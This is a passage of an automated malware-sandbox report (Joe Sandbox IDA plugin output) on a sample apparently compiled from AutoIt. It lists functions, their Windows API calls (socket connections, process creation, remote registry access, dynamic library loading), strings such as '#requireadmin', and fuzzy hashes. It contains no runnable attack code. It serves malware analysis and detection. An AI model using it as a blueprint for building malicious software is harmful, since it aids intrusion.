Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 4463ce4d91cff3d2d3befa40ee2264c120430020ac0eb89df64ca8a968f28f0d
Instruction ID: a1d8b6620e6f4365dc65f619d6373ecc95aeb4faab79c5c8193ef359a5d83949
Opcode Fuzzy Hash: 4463ce4d91cff3d2d3befa40ee2264c120430020ac0eb89df64ca8a968f28f0d
Instruction Fuzzy Hash: 47312F71900109BFEB159F90DC89EFFB7BDEF09300F100269E501E6241DA745E8A9BA0

Function 006862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006862EC
GetWindowLongW.USER32(01425550,000000F0), ref: 0068631F
GetWindowLongW.USER32(01425550,000000F0), ref: 00686354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00686386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006863B0
GetWindowLongW.USER32(00000000,000000F0), ref: 006863C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006863DB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 4740b6be2ab3e9c90aa7d1d98925da76fc5b16f4220c515456771401fa3c938d
Instruction ID: 06e6676fd2a6ba92e41df41bc57614884c1068cb39a392f04309e8421e354c98
Opcode Fuzzy Hash: 4740b6be2ab3e9c90aa7d1d98925da76fc5b16f4220c515456771401fa3c938d
Instruction Fuzzy Hash: D931F230644250AFDB21DF18EC89FA537E2FB4A714F1922A8F501DF2B2CB71AC809B51

Function 0065DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DB54
SysAllocString.OLEAUT32(00000000), ref: 0065DB57
SysAllocString.OLEAUT32(?), ref: 0065DB75
SysFreeString.OLEAUT32(?), ref: 0065DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 0065DBA3
SysAllocString.OLEAUT32(?), ref: 0065DBB1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d8232d4c8dc42d8327d3e074c52feeeb19c90a29effce6c6eb25e0f4f0a07740
Instruction ID: e03bdcbfed8fbe2b896f974e439d21f718f2ab17895144662aca98ec66f3feab
Opcode Fuzzy Hash: d8232d4c8dc42d8327d3e074c52feeeb19c90a29effce6c6eb25e0f4f0a07740
Instruction Fuzzy Hash: E2218176600219BFEF20DFA8DC88CBB73EEEB09361B118526FD54DB291D6709C458764

Function 00676173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00677D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00677DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006761C6
WSAGetLastError.WSOCK32(00000000), ref: 006761D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0067620E
connect.WSOCK32(00000000,?,00000010), ref: 00676217
WSAGetLastError.WSOCK32 ref: 00676221
closesocket.WSOCK32(00000000), ref: 0067624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676263

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: ceb577c971a2154805b0afc630d2e7b154fe4da70ed644e9c0c770e724dac14c
Instruction ID: 4d8b190e84cacf5518fc2c38a71b5076754b1bf440ec73d81d6b3706c1a41e75
Opcode Fuzzy Hash: ceb577c971a2154805b0afc630d2e7b154fe4da70ed644e9c0c770e724dac14c
Instruction Fuzzy Hash: EA31A471600504ABDF50AF24CC85BBE7BAAEF45710F048569FD19A7292DB70AD448B61

Function 0065F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0065F671
__wcsnicmp.LIBCMT ref: 0065F692
__wcsnicmp.LIBCMT ref: 0065F6AC

Strings

#OnAutoItStartRegister, xrefs: 0065F6A6
#requireadmin, xrefs: 0065F68C
#notrayicon, xrefs: 0065F669

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 69d358e4ebde68215656f2c0f24aa48dd6c88d5412122284fdda8664ebe5fab7
Instruction ID: cff82ee36e9d5634a544b189d3fff170111e95712caeccfec748d34a66ed4a00
Opcode Fuzzy Hash: 69d358e4ebde68215656f2c0f24aa48dd6c88d5412122284fdda8664ebe5fab7
Instruction Fuzzy Hash: F12179722045227AD620A734FC12EE773DFDF59301F10443DFC8187291EB919D8AD698

Function 0065DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DC2F
SysAllocString.OLEAUT32(00000000), ref: 0065DC32
SysAllocString.OLEAUT32 ref: 0065DC53
SysFreeString.OLEAUT32 ref: 0065DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 0065DC76
SysAllocString.OLEAUT32(?), ref: 0065DC84

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f79e5d057db667872c541abe4bbbf691d7b1f4af1a33cc78bbc3203093274687
Instruction ID: 91bc2da8a7e78443e43f2bae51381dad4c2095f970d483fbfffb6afac3c60800
Opcode Fuzzy Hash: f79e5d057db667872c541abe4bbbf691d7b1f4af1a33cc78bbc3203093274687
Instruction Fuzzy Hash: 24218675604205BF9B20DFA8DC88DAB77EEEB08361B108165FD55CB2A1D670DC45CB64

Function 006875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00687632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0068763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0068764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00687659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00687665

Strings

Msctls_Progress32, xrefs: 00687603

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a6846766e4eb68ca43efdd1b5f34f3794e7e609cc80117e882db681c0dfb7ddc
Instruction ID: 2f99609b99b00e69d4b44070dc940fa79cf5aae675ecf032294ca66cd15ef54d
Opcode Fuzzy Hash: a6846766e4eb68ca43efdd1b5f34f3794e7e609cc80117e882db681c0dfb7ddc
Instruction Fuzzy Hash: A411E6B1150119BFEF149F64CC85EE77F6EEF08398F114214B604A21A0D672DC61DBA4

Function 00629AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00629AE6

Part of subcall function 00623187: EncodePointer.KERNEL32(00000000), ref: 0062318A
Part of subcall function 00623187: __initp_misc_winsig.LIBCMT ref: 006231A5
Part of subcall function 00623187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00629EA0
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00629EB4
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00629EC7
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00629EDA
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00629EED
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00629F00
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00629F13
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00629F26
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00629F39
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00629F4C
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00629F5F
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00629F72
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00629F85
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00629F98
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00629FAB
Part of subcall function 00623187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00629FBE

__mtinitlocks.LIBCMT ref: 00629AEB
__mtterm.LIBCMT ref: 00629AF4

Part of subcall function 00629B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00629AF9,00627CD0,006BA0B8,00000014), ref: 00629C56
Part of subcall function 00629B5C: _free.LIBCMT ref: 00629C5D
Part of subcall function 00629B5C: DeleteCriticalSection.KERNEL32(02l,?,?,00629AF9,00627CD0,006BA0B8,00000014), ref: 00629C7F

__calloc_crt.LIBCMT ref: 00629B19
__initptd.LIBCMT ref: 00629B3B
GetCurrentThreadId.KERNEL32 ref: 00629B42

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: ff591124b70d2c2354a3e609e1aa7a639b95dd45655f56c0668a91c4a1e122a2
Instruction ID: 777c0d87aac19726a818e8d8cf89e92cf2e483dd8b9d42be70cd6bbc11fe8990
Opcode Fuzzy Hash: ff591124b70d2c2354a3e609e1aa7a639b95dd45655f56c0668a91c4a1e122a2
Instruction Fuzzy Hash: 92F06D32619F316AE7A47774BC076CB2697AF82735F200A1DF464962D2EF2184414EB8

Function 0068B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068B644
_memset.LIBCMT ref: 0068B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006C6F20,006C6F64), ref: 0068B682
CloseHandle.KERNEL32 ref: 0068B694

Strings

dol, xrefs: 0068B64D
ol, xrefs: 0068B63E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: ol$dol
API String ID: 3277943733-828293295
Opcode ID: bf4013ac3694bfc7d405118e5b521f660b0559b1a7d48c051a6fc13a4af2f95e
Instruction ID: e439e9276288290c2479d3823c569f70d275d2d12143356cef7d896b9c624651
Opcode Fuzzy Hash: bf4013ac3694bfc7d405118e5b521f660b0559b1a7d48c051a6fc13a4af2f95e
Instruction Fuzzy Hash: AAF05EB25403107BE3102B61FC0AFBB7A9FEB08395F005428FA18E5192D7718C008BAC

Function 0062406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00623F85), ref: 00624085
GetProcAddress.KERNEL32(00000000), ref: 0062408C
EncodePointer.KERNEL32(00000000), ref: 00624097
DecodePointer.KERNEL32(00623F85), ref: 006240B2

Strings

combase.dll, xrefs: 00624080
RoUninitialize, xrefs: 00624074

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: afa7440c550bc7478bc577312e1b0c43a493678df46dc668dfedd2f7969a5d06
Instruction ID: 4cf96a1feb7f7c0e9e36a89a4d12702b9ea65619efbcac4dbb5091186c7fa05c
Opcode Fuzzy Hash: afa7440c550bc7478bc577312e1b0c43a493678df46dc668dfedd2f7969a5d06
Instruction Fuzzy Hash: DAE0BF70541311FFDB109F61ED0DF953AA7BB04742F14A124F101E1AA0CF764644DF95

Function 006664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0066660B
_memmove.LIBCMT ref: 00666546

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

_memmove.LIBCMT ref: 006665B9
_memmove.LIBCMT ref: 006666A0
_memmove.LIBCMT ref: 006666B9
_memmove.LIBCMT ref: 006666D5

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
Instruction ID: e3418981cc8224443fb1ac2593d46603aa33dec00cea7860300a3ffb713eadda
Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
Instruction Fuzzy Hash: AD618E7050065AABDF45EF60DC82AFF37A7AF05308F048919F8566B293DB34AD06CB65

Function 006801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 00680E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00680320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00680349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0068038C
RegCloseKey.ADVAPI32(00000000), ref: 00680399

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 7eede53f37e62f95e80633160e29f59dcc70c723137abfeb6ae62966e6839320
Instruction ID: 8851b38ac22e0364064cfbd50bf6541974bdbadb167e5cb78aaf2363f0be64bd
Opcode Fuzzy Hash: 7eede53f37e62f95e80633160e29f59dcc70c723137abfeb6ae62966e6839320
Instruction Fuzzy Hash: 13516C31108201AFD754EF64C895EAFBBEAFF85314F044A1DF585872A2DB31E909CB56

Function 00685799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006857FB
GetMenuItemCount.USER32(00000000), ref: 00685832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0068585A
GetMenuItemID.USER32(?,?), ref: 006858C9
GetSubMenu.USER32(?,?), ref: 006858D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00685928

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 137b7913b70e9c478ca4a2a0312b30ad884bfeeefe989cf08acfddf553848f4b
Instruction ID: d8095d2af43559dfb18614936b364935d3f2dcc07cda9eea2efa1f6aaa3c0636
Opcode Fuzzy Hash: 137b7913b70e9c478ca4a2a0312b30ad884bfeeefe989cf08acfddf553848f4b
Instruction Fuzzy Hash: BE519071E00625EFCF14EF64C8459AEB7B6EF48310F10456AE802BB351CB74AE41CB94

Function 0065EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0065EF06
VariantClear.OLEAUT32(00000013), ref: 0065EF78
VariantClear.OLEAUT32(00000000), ref: 0065EFD3
_memmove.LIBCMT ref: 0065EFFD
VariantClear.OLEAUT32(?), ref: 0065F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0065F078

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: ff5474beaad40cfca1f952b0513dfe44891753caf815eacafb5bfd3086788318
Instruction ID: aa5f83a8b5fe28e8fc88897755331a62c0f273413538a22e04234776d0a875f2
Opcode Fuzzy Hash: ff5474beaad40cfca1f952b0513dfe44891753caf815eacafb5bfd3086788318
Instruction Fuzzy Hash: 5D5155B5A00209AFCB14CF58C894AAAB7F9FF4C310F15856AED49DB341E331E915CBA0

Function 0066220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006622A3
IsMenu.USER32(00000000), ref: 006622C3
CreatePopupMenu.USER32 ref: 006622F7
GetMenuItemCount.USER32(000000FF), ref: 00662355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00662386

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
Instruction ID: 6d054406fd05b46858f004587ea2a6928fee6015244bcc4af9fa8bf372914e2a
Opcode Fuzzy Hash: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
Instruction Fuzzy Hash: 9451BD70A00A4BEBDF21CF68D8A8BEDBBF6BF05314F104629E811A7390D7749945CB51

Function 00601765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0060179A
GetWindowRect.USER32(?,?), ref: 006017FE
ScreenToClient.USER32(?,?), ref: 0060181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0060182C
EndPaint.USER32(?,?), ref: 00601876

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

